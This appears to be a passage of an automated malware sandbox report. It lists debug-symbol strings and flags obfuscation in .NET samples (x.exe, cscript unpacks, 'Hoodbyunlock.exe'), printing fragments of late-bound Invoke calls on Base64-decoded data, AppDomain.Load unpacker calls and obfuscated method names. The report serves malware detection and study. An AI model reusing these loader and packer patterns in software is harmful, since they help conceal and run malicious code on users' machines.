                      Source: Binary string: System.Core.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb.> source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdbH source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.hctFYntEyoMgB8hZd9xGjKiH4UxZ9kZA,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.OKr7zS8MQMacXeqK3iev2eaTr2vacnGn,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.NJxpGPl7YQpHngjsp7M7TU6YMY0cu1La,tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.HTzj12LlhNe5SbtvC0D5NV0eE8IEM8E7,UAKhR7NJbD3KWn0Nd.URj8adqUn7sVUtnpu()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{cmLBX7vu99RPL0GFG[2],UAKhR7NJbD3KWn0Nd.dKXd5zfpfc7tYe29X(Convert.FromBase64String(cmLBX7vu99RPL0GFG[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { cmLBX7vu99RPL0GFG[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: kQDJ059RzJMZ4crRs System.AppDomain.Load(byte[])
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B System.AppDomain.Load(byte[])
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs.Net Code: ok69o9SxhgTvypW4B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF847022458 push ebx; iretd 7_2_00007FF8470224CA
                      Source: x.exe.6.dr, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: x.exe.6.dr, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: x.exe.6.dr, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: x.exe.6.dr, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: x.exe.6.dr, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: x.exe.6.dr, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: x.exe.6.dr, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: x.exe.6.dr, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: x.exe.6.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: x.exe.6.dr, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: x.exe.6.dr, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: x.exe.6.dr, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
